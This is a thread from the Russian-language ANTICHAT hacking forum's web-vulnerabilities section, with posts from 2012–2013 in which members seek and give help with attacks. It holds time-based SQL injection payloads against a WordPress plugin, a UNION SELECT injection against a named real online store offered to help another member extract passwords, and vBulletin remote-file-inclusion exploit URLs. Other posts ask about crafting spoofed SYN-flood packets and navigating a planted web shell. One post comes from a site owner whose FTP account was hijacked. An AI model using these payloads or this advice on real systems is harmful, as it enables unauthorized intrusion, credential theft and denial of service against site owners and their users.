HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #451  
Старый 09.12.2012, 16:10
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от Pinkie  
Pinkie said:
чем отправлять post запрос на сайт чужой?
Burp Suite, HTTP Analyze -> build request
 
Ответить с цитированием

  #452  
Старый 09.12.2012, 17:18
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от blesse  
blesse said:
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db
Poc:
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20
Я запрашиваю:
1)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20
2)
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
сайт в пм вышли, я тут синтаксис напишу нужный
 
Ответить с цитированием

  #453  
Старый 12.12.2012, 13:36
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:
Привет! Через havij получаю доступ к базе http://store.vampirefreaks.com/?cat_id=11 но не могу вытянуть пароли ,просто ??? http://imageshack.us/photo/my-images/10/utennavnxd.png/
можно как-то вытянуть пароли?
Вывод можно добиться вот так

_ttp://store.vampirefreaks.com/?cat_id=-11'+union+select+1,2,@@version,4,5+and+1='2

Забудь про havij - он не более чем дампер. Выведешь руками - потом сдампишь.

А вообще тема для подобных вопросов тут
 
Ответить с цитированием

  #454  
Старый 12.12.2012, 18:13
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
сайт в пм вышли, я тут синтаксис напишу нужный
Ну что не осилил?
 
Ответить с цитированием

  #455  
Старый 12.12.2012, 18:17
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от blesse  
blesse said:
Ну что не осилил?
Продублируй в ПМ. Походу удалил случайно пока почту чистил.
 
Ответить с цитированием

  #456  
Старый 18.01.2013, 12:17
-WarMan-
Новичок
Регистрация: 08.04.2009
Сообщений: 26
Провел на форуме:
41377

Репутация: 1
По умолчанию

Мужики, кто знаком с Textpattern 4.0.5, подскажите в каком файле лежит шаблон. Доступа в админку нет, а через шелл не удается найти шаблон, уже все перерыл.
 
Ответить с цитированием

  #457  
Старый 29.01.2013, 14:19
dima.lysyj
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Syn flood

Подскажите пожалуйста с таким вопросом: Syn flood, собираю пакет с случайным ip, если отправляю пакет с той же подсети что и сервер, тогда на сервере создается очередь полуоткрытых соединений, если же подсеть другая (внешний канал) тогда пакеты не доставляются. Чексумма правильная. Совсем не знаю в чем ошибка.
 
Ответить с цитированием

  #458  
Старый 29.01.2013, 18:48
abako
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Угнали ФТП,- нужно проверить на шеллы

Здравствуйте форумчане, такая ситуация:

вирус поймал, угнал мои фтп пароли, повшивали редиректов и .htaccess и ифреймов в шаблоны.

Я все сделал - обезопасил доступ, но нужна помощь в проверке на шелы итд. - хостинг ukraine ком юа.

буду рад любой информации или предложениям!
 
Ответить с цитированием

  #459  
Старый 01.02.2013, 09:51
rk3v
Guest
Сообщений: n/a
Провел на форуме:
447

Репутация: 0
По умолчанию

Какой алгоритм генерации хэшей паролей использует ebiz cms?
 
Ответить с цитированием

  #460  
Старый 10.02.2013, 01:17
warhamer2012
Guest
Сообщений: n/a
Провел на форуме:
11910

Репутация: 0
По умолчанию

Мужики, подскажите насчет vbulletin 4.0.2 Remote File Inclusion

Кто-то пробовал? Все облазил-нашел только следующее

# Exploit :

#

# http://www.site.com/path/includes/class_block.php?classfile=[shell code]

#

# http://www.site.com/path/vb/vb.php?filename=[shell code]

#

# http://www.site.com/path/packages/vbattach/attach.php?include_file=[shell code]


Но не прокатывает на ни на цели, ни на локалке. Что я делаю не так? Или это фейк???

Если не сюда пишу-посоветуйте раздел, где спросить можно.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ